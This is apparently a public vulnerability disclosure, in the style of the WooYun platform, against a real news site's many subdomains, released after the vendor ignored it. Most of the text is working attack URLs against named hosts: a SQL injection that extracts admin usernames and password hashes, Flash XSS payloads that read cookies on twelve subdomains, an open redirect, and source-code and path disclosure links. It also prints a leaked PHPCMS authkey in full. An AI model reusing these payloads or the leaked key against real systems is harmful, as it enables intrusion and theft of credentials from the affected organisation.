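2015-12-15: Details reported to the vendor; awaiting vendor handling.
2015-12-20: The vendor chose to ignore the vulnerability; details disclosed to the public.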
As per the title.
Dedecms /plus/download.php URL redirect
http://app.cjn.cn/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D

Dedecms Path Disclosure
http://app.cjn.cn/data/mysql_error_trace.inc

SQL injection
http://app.cjn.cn/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a

Dedecms /plus/download.php URL redirect
http://app1.cjn.cn/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D

Dedecms Path Disclosure
http://app1.cjn.cn/data/mysql_error_trace.inc

SQL injection
http://app1.cjn.cn/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a

Flash XSS
http://app1.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}
http://byby.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}
http://hbjs.cjn.cn/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}
http://it.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}
http://jkys.cjn.cn/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}
http://lady.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}
http://life.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}
http://pinyou.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}
http://wh2049.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}
http://www.cjn.cn/hs/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}
http://yazg.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}
http://yy.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}

Source code disclosure
http://e.cjn.cn/upload.jsp
http://e.cjn.cn/image.jsp

http://jkys.cjn.cn/
PHPCMS authkey disclosure
LNgIcALH2pF0kpzZN9rGVA2qZgP7ugc2

As above.
Severity: no impact (ignored by vendor)
Ignored at: 2015-12-20 11:00
Vulnerability Rank: 4 (WooYun rating)
None yet.